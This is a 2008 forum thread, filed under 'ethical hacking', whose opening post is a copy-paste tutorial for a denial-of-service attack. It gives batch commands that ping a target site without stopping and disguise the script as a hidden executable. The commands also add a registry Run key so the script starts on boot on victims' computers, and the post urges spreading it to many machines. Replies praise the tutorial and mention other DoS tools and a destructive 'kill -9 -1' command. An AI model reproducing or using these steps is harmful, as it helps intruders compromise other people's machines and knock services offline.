DOS testing

Discussion in 'Ethical hacking Tips' started by Dak914, Jun 19, 2008.

  1. Dak914

    Dak914 Member

    Joined:
    May 3, 2008
    Messages:
    48
    Likes Received:
    5
    Trophy Points:
    8
    Ever wonder how you can perform a DOS (denial of service) that doesnt require any fancy code or what not? Well, here it is. You dont really have to learn any coding language to understand this, pretty much just copy and paste.

    Perform DOS :surprised
    1. Open up notepad. Type in (dont include quotes unless I say so)(I am a command prompt junkie :pleased: ) "ping -t www.yourtarget.com". Change yourtarget.com to whatever site you want to DOS.
    2. Save the file as "DOS.BAT".
    3. Run the file to test that it works. If you see the program pinging, like below, only on and on, than the program works.
      [​IMG]
    4. Make that a ghost EXE using the tool bat_to_exe from this site: http://www.f2ko.de/English/b2e/index.php
      Make sure you check the box ghost app at the bottom
    5. Open up notepad again. Type in the following:
      MD C:\WINDOWS\SYSTEM32\PING
      COPY DOS.EXE C:\WINDOWS\SYSTEM32\PING
      cd C:\windows\system32
      attrib ping +h /s /d
      REG ADD HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /v DOS /t REG_SZ /d C:\windows\system32\ping\dos.exe
    6. Save that as Ping.bat. This is assuming your primary drive is the drive C:. You may want to leave this a BAT file for that reason.
    7. Put the DOS.exe and the Ping.bat into the same directory. You may want to create a new folder.
    8. Get that folder onto the vics computer or put it onto a usb and run from that on the vics comp. When done, run the ping.bat file. Logoff. WARNING: this may make explorer not start or start slowly, which is the reason for running on a vics computer.
    9. Run the ping.bat on a lot of computers, this will make the traffic for the site really slow or will run a DOS. Have fun!
      ps this is the really hard way of doing it. You might want to get some software.
     
    Last edited by a moderator: Jan 21, 2017
  2. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Joined:
    Jun 27, 2007
    Messages:
    561
    Likes Received:
    19
    Trophy Points:
    0
    or just download DOSHTTP? or DO v2.0 o_O?
     
  3. dangerboy

    dangerboy New Member

    Joined:
    Jun 20, 2008
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    0
    wow this is nice.. thank you for the tip..
     
  4. Bhullarz

    Bhullarz New Member

    Joined:
    Nov 15, 2006
    Messages:
    253
    Likes Received:
    13
    Trophy Points:
    0
    Occupation:
    System Manager
    Home Page:
    http://www.tutors161.com
    Thanks for the tool. I was really looking for such tool.
     
  5. denire

    denire New Member

    Joined:
    Jun 26, 2008
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    0
    Thanks for the post. I just want to ask when are we going to use the Denial of service? What is Denial of Service for?
     
  6. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,375
    Likes Received:
    388
    Trophy Points:
    83
    Please do not use the posts for self promotion but use the signature. To activate the signature you would need to have 10 posts.
     
  7. pradeep

    pradeep Team Leader

    Joined:
    Apr 4, 2005
    Messages:
    1,645
    Likes Received:
    87
    Trophy Points:
    0
    Occupation:
    Programmer
    Location:
    Kolkata, India
    Home Page:
    http://blog.pradeep.net.in
    Nice One!
     
  8. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,375
    Likes Received:
    388
    Trophy Points:
    83
  9. rider

    rider New Member

    Joined:
    Jul 10, 2008
    Messages:
    49
    Likes Received:
    0
    Trophy Points:
    0
    Home Page:
    http://hacked.ro
    This type of flood is available only for PC`s with hi internet speed not for the normal pc`s who have a speed about 6-10Mb/s . For unix systems is easyer because i know alot of perl programs used to flood, the problem in linux is that you have a slower pc you can get a nice system crash .. something like a kill -9 -1 ;)
     
  10. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,375
    Likes Received:
    388
    Trophy Points:
    83
  11. hanleyhansen

    hanleyhansen New Member

    Joined:
    Jan 24, 2008
    Messages:
    336
    Likes Received:
    8
    Trophy Points:
    0
    Occupation:
    Drupal Developer/LAMP Developer
    Location:
    Clifton
    Home Page:
    http://www.hanseninfotech.com
    This is great but not very effective if you want to do a DDos because you have to take the files your self to the zoombie computers. But great tutorial!!
     

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice